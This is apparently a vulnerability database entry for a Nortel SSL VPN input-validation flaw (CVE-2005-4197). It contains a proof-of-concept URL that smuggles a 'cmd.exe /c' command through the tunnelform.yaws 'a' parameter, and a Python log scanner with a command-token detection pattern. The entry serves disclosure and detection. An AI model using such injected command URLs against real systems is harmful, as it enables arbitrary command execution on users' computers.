Nortel SSL VPN Cross-Site Scripting / Command Execution Vulnerability

Vulnerability ID: 1109413    Vulnerability type: Input validation
Published: 2005-12-08    Updated: 2006-01-12
CVE ID: CVE-2005-4197    CNNVD ID: CNNVD-200512-228
Platform: CGI    CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/26771
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200512-228
|Vulnerability details
Nortel SSL VPN is a remote access security solution that uses Secure Sockets Layer (SSL) as its underlying security protocol. The web interface of Nortel's SSL VPN does not sufficiently validate user input, so an attacker can hide commands inside links on certain pages. Because the Java applet invoked from these pages is cryptographically signed, arbitrary system commands may end up being executed with the privileges of the browser user.
|Exploit
source: http://www.securityfocus.com/bid/15798/info

Nortel SSL VPN is prone to an input validation vulnerability. This issue could be exploited to cause arbitrary commands to be executed on a user's computer. Cross-site scripting attacks are also possible.

Nortel SSL VPN 4.2.1.6 is vulnerable to this issue; other versions may also be affected. 

https://SSL_VPN_SERVER/tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1&ph=&pp=&0tm=tcp&0lh=127.0.0.1&0lp=8080&0hm=&0rh=10.10.10.10&0rp=80&sslEnabled=on&start=Start...
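The proof-of-concept URL above carries the command in the `a` parameter of `tunnelform.yaws`. As an added detection example (not part of the original advisory or vendor code), the following scans constructed web-server access log lines for requests to that page whose `a` value looks like an executable command rather than a host name; the log format and the command-token pattern are assumptions.

```python
"""Flag requests that pass a command through the ``a`` parameter of
Nortel SSL VPN's tunnelform.yaws (CVE-2005-4197). Added example, not
vendor code; the log lines below are constructed samples."""
import re
from urllib.parse import urlsplit, parse_qs

# Tokens that indicate an executable command instead of a host name
# (the PoC abuses "cmd.exe /c ..."); this pattern is an assumption.
COMMAND_PATTERN = re.compile(
    r"(cmd\.exe|\.exe\b|\.bat\b|/c\s|[;&|>]|\\)", re.IGNORECASE)

# Constructed combined-format access log sample: one PoC-style request,
# one legitimate tunnel request, one unrelated request.
SAMPLE_LOG = [
    r'10.0.0.5 - - [08/Dec/2005:10:00:00 +0000] "GET /tunnelform.yaws?a=+cmd.exe+/c+echo+test+%3E+c:\\test.txt+&type=Custom&sp=443&n=1 HTTP/1.1" 200 512',
    r'10.0.0.6 - - [08/Dec/2005:10:00:01 +0000] "GET /tunnelform.yaws?a=intranet.example.com&type=Custom&sp=443 HTTP/1.1" 200 512',
    r'10.0.0.7 - - [08/Dec/2005:10:00:02 +0000] "GET /index.yaws HTTP/1.1" 200 128',
]


def is_tunnelform_injection(url):
    """True if url targets tunnelform.yaws with a command-like ``a`` value."""
    parts = urlsplit(url)
    if not parts.path.lower().endswith("/tunnelform.yaws"):
        return False
    # parse_qs decodes '+' and %XX, so the check sees the real command text
    for value in parse_qs(parts.query, keep_blank_values=True).get("a", []):
        if COMMAND_PATTERN.search(value.strip()):
            return True
    return False


def flag_log(lines):
    """Return the request URLs from access log lines that match the check."""
    flagged = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and is_tunnelform_injection(m.group(1)):
            flagged.append(m.group(1))
    return flagged


if __name__ == "__main__":
    for url in flag_log(SAMPLE_LOG):
        print("suspicious tunnelform request:", url)
```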
|References

Source: BID
Name: 15798
Link: http://www.securityfocus.com/bid/15798
Source: BUGTRAQ
Name: 20051212 SEC Consult SA-20051211-0 :: Nortel SSL VPN Cross Site Scripting/Command Execution
Link: http://www.securityfocus.com/archive/1/archive/1/419263/100/0/threaded
Source: MISC
Link: http://www.sec-consult.com/247.html
Source: VUPEN
Name: ADV-2005-2845
Link: http://www.frsirt.com/english/advisories/2005/2845
Source: SECTRACK
Name: 1015341
Link: http://securitytracker.com/id?1015341
Source: SECUNIA
Name: 17974
Link: http://secunia.com/advisories/17974